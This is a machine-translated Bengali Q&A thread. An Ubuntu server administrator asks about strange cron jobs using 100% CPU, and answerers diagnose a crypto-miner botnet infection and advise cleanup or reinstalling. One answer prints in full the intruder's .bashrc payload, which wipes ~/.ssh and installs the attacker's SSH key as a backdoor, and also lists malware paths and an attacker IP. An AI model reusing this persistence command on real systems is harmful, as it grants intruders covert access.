অদ্ভুত ক্রোন জব সিপিইউ উবুন্টু 18 এলটিএস সার্ভারের 100% নেয়


21

আমি ওয়েয়ার ক্রোন জবগুলি দেখিয়ে চলেছি এবং তারা কী করে তা আমার কোনও ধারণা নেই। আমি তাদের থামাতে সাধারণত কিল -9 জারি করি। তারা আমার সিপিইউর 100% নেয় এবং আমি পরীক্ষা না করা অবধি কয়েক দিন চলতে পারে। এর অর্থ কী কেউ জানে?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

গতকাল 7/24/2019 পর্যন্ত আমি উবুন্টু 18 এলটিএস সার্ভারটি পুরোপুরি আপ টু ডেট চালাচ্ছি

হালনাগাদ

আমি সমস্ত প্রতিক্রিয়া প্রশংসা করি। আমি সমস্ত ডেটা এবং অ্যাপ্লিকেশন ড্রাইভ সংযোগ বিচ্ছিন্ন করেছি যেহেতু কেবলমাত্র ওএস ড্রাইভই আক্রান্ত হয়েছিল, আমি কমপক্ষে এই ধরণের জিনিসটি যথাযথভাবে করেছি। আমি আরও অনেক সুরক্ষা এবং আরও সুরক্ষিত পদ্ধতি সহ একটি সম্পূর্ণ পুনর্নির্মাণের সাথে যাচ্ছি।


8
.firefoxcatcheফায়ারফক্সের সাথে সম্ভবত কিছু করার নেই - এটি কি কেবল বিটকয়েন মাইনার হতে পারে? এক্সিকিউটেবলগুলিকে ভাইরাসটাল আপলোড করার চেষ্টা করুন।
থম উইগার্স 15

1
যে নিম্নলিখিতরূপে crontab পরিবর্তন দ্বারা চালানো ফাইল /root/.firefoxcatche/a/updএবং/root/.firefoxcatche/b/sync
থম Wiggers

2
"আমি এটি খুঁজে পাওয়ার জন্য ক্রন্টবকে খুঁজে পাচ্ছি না" এর অর্থ কী? sudo crontab -eসম্পাদনা কেন কাজ করবে না? তবে এটি যদি কোনও ক্রিপ্টোমিনিয়ার হয় তবে আপনি ইনস্টল করেননি ... সেগুলি আবার যুক্ত করা হবে। "/Root/.firefoxcatche/a/upd" এর 1 ম চেহারাটি এটি কী করে।
রিনজউইন্ড

2
"সেখানে যাওয়ার জন্য কী আমাকে মূল হিসাবে লগ ইন করতে হবে?" এটি এমন একটি প্রশ্ন যা আমি প্রশাসকের কাছ থেকে দেখার আশা করি না। এখন থেকে আপনি কী করছেন তা সত্যই আপনার জানতে হবে। ASAP অ্যাডমিন পাসওয়ার্ড পরিবর্তন করুন। ক্রোন তালিকাভুক্ত ফাইলগুলি পরীক্ষা করুন। তাদের নির্মূল করুন।
রিঞ্জউইন্ড

1
তবে এটি এত সহজ ;-) আমি 10+ গুগল ক্লাউড উদাহরণ বজায় রাখি। যে কোনও কিছুর বিষয়ে आकस्मिक পরিকল্পনা নিয়ে আমি ভুল হতে ভেবেছিলাম। যদি এরকম কিছু ঘটে থাকে তবে আমি মূল উদাহরণটি ধ্বংস করব, একটি নতুন তৈরি করব, ক্লোনটির বিপরীতে ডেটা ডিস্ক স্ক্যান করব, পার্থক্যগুলি স্ক্যান করব এবং তারপরে এটি সংযোজন করব। এবং এই ব্যক্তিকে আবার ঘটতে না পারে তার জন্য ফাঁদে ফেলতে কিছু বাস্তবায়ন করুন। আমার ক্ষেত্রে আমার
বেতনটি

উত্তর:


40

আপনার মেশিনে সম্ভবত ক্রিপ্টো মাইনার সংক্রমণ রয়েছে। সিকিউরিটি সেন্টারের সাথে আজুরের ভার্চুয়াল মেশিনের রিয়েল-লাইফ সনাক্তকরণে আপনি অন্য কারও অনুরূপ ফাইলের নাম এবং আচরণের প্রতিবেদন দেখতে পাচ্ছেন । আরও দেখুন আমার উবুন্টু সার্ভার একটি ভাইরাস আছে ... আমি এটা অবস্থিত করেছি কিন্তু আমি তা পরিত্রাণ পেতে না ... Reddit এ।

আপনি আর সেই মেশিনকে বিশ্বাস করতে পারবেন না এবং এটি আবার ইনস্টল করা উচিত। ব্যাকআপগুলি পুনরুদ্ধার করতে সাবধান হন।


8
আমি রাজী. রুট পাসওয়ার্ড আপোস হয়েছে তাই পুনরায় ইনস্টল করুন এবং ব্যাকআপের সাথে খুব সাবধানতা অবলম্বন করুন; এটি সেখানেও হতে পারে।
রিনজুইন্ড 15

9

আপনার মেশিনটি ক্রিপ্টো মাইনারের আক্রমণে আক্রান্ত হয়েছে। আমি অতীতেও একই ধরণের রেনসওয়্যার হামলার মুখোমুখি হয়েছিলাম এবং আমার ডেটাবেস আপোস করা হয়েছিল। আমি মেশিনটির জন্য একটি এসকিউএল ডাম্প নিয়েছিলাম এবং মেশিনটি পুনঃনির্ধারণ করেছি (কারণ আমার মেশিনটি এডাব্লুএস ইসি 2 তে হোস্ট করা ভিএম ছিল)। আমি এসএসএইচ অ্যাক্সেস এবং সংশোধিত পাসওয়ার্ডগুলি লকড করার জন্য মেশিনের সুরক্ষা গোষ্ঠীগুলিও সংশোধন করেছি। আমি লগ ক্যোয়ারীগুলিতে লগিং সক্ষম করেছিলাম এবং এটি প্রতি রাতে এস 3 এ রফতানি করি।


4

আমার ক্ষেত্রেও একই ঘটনা ঘটেছিল এবং আমি গতকাল লক্ষ্য করেছি। আমি ফাইলটি যাচাই করেছিলাম /var/log/syslogএবং এই আইপি (185.234.218.40) স্বয়ংক্রিয়ভাবে ক্রোনজব চালাচ্ছে বলে মনে হয়েছে।

আমি HTTP এ এটি পরীক্ষা করে দেখি ( https://phaismyipaddress.com/ip/185.234.218.40 ) এবং এর কিছু প্রতিবেদন রয়েছে। এই ফাইলগুলি ট্রোজান সম্পাদনা করেছিল:

  • .bashrc
  • .ssh / authorized_keys -র

আমি এটি শেষে পেয়েছি .bashrc(যা প্রতিটি বার ব্যাশ খোলার পরে কার্যকর করা হয়):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

এটি আপনার authorized_keysফাইলটি মোছা হচ্ছে , এটি এসএসএইচ কীগুলির একটি তালিকা যা কোনও পাসওয়ার্ড ছাড়াই সংযোগ করার অনুমতিপ্রাপ্ত। তারপরে, এটি আক্রমণকারীটির এসএসএইচ কী যুক্ত করে:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

তদতিরিক্ত, আমি এই ফোল্ডারটি পেয়েছি: /tmp/.X13-unix/.rsyncযেখানে সমস্ত ম্যালওয়্যার। এমনকি আমি একটি ফাইল, /tmp/.X13-unix/.rsync/c/ip70,000 আইপি অ্যাড্রেস সম্বলিত একটি ফাইল পেয়েছি যা সম্ভবত অন্যান্য ক্ষতিগ্রস্থ বা নোড সার্ভার রয়েছে।

2 টি সমাধান রয়েছে: এ:

  • এক্সপোর্ট ব্যর্থ পাসওয়ার্ডের পরে আইপি ঠিকানাকে নিষিদ্ধ করে এমন একটি প্রোগ্রাম যা পোর্ট 22 এবং আপনার প্রয়োজনীয় খুঁজে পাওয়া যায় এবং ব্যর্থ 2ban সক্ষম করে ব্যতীত সমস্ত বহির্গামী সংযোগগুলি অবরুদ্ধ করে ফায়ারওয়াল যুক্ত করুন X

  • সমস্ত ক্রোন জব ps aux | grep cronহত্যা করুন:, তারপরে যে পিআইডি প্রদর্শিত হবে তাকে হত্যা করুন

  • আপনার পাসওয়ার্ডটি একটি সুরক্ষিত পাসওয়ার্ডে পরিবর্তন করুন

খ:

  • আপনার প্রয়োজন বা চান যে কোনও ফাইল বা ফোল্ডার ব্যাক আপ করুন

  • সার্ভারটি পুনরায় সেট করুন এবং উবুন্টু পুনরায় ইনস্টল করুন বা সরাসরি একটি নতুন ফোঁট তৈরি করুন

    থম উইগার্স যেমন বলেছেন, আপনি অবশ্যই একটি বিটকয়েন মাইনিং বোটনেটের অংশ, এবং আপনার সার্ভারটির একটি ব্যাকডোর রয়েছে । পিছনের অংশে একটি পার্ল শোষণ নিয়োগ করে, একটি ফাইল এখানে অবস্থিত: এতে /tmp/.X13-unix/.rsync/b/run( https://pastebin.com/ceP2jsUy ) রয়েছে

আমি খুঁজে পাওয়া সন্দেহজনক ফোল্ডারগুলি হ'ল:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (যা সম্পাদিত হয়েছিল)

  • ~/.firefoxcatche

পরিশেষে, এখানে পার্ল ব্যাকডোর সম্পর্কিত একটি নিবন্ধ রয়েছে: https://blog.trendmicro.com/trendlabs-security-inte होतेnce/outlaw-hacking-groups-botnet-observ-spreading-miner-perl-based-backdoor/

আশা করি এটি আপনার কাজে লাগবে।


আমি ওএস ড্রাইভটি মুছে ফেলা এবং পুনরায় ইনস্টল করে উবুন্টু একটি নতুন পাসওয়ার্ড তৈরি করে যা বরং দীর্ঘ এবং নতুন
এসএসএস

হ্যাঁ, এটি একটি ভাল সমাধান :)
ওখ্যাক্স

এটি একটি খুব সহায়ক উত্তর ছিল - ~/.bashrcসম্পাদিত সত্যটি ধরা পড়ার জন্য আপনাকে ধন্যবাদ । আমি খুঁজে পেয়েছি যে বোগাসকে হত্যা করার জন্য rsyncআমাকে ইস্যু করতে হয়েছিল kill -9 <pid>
বেনি হিল
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.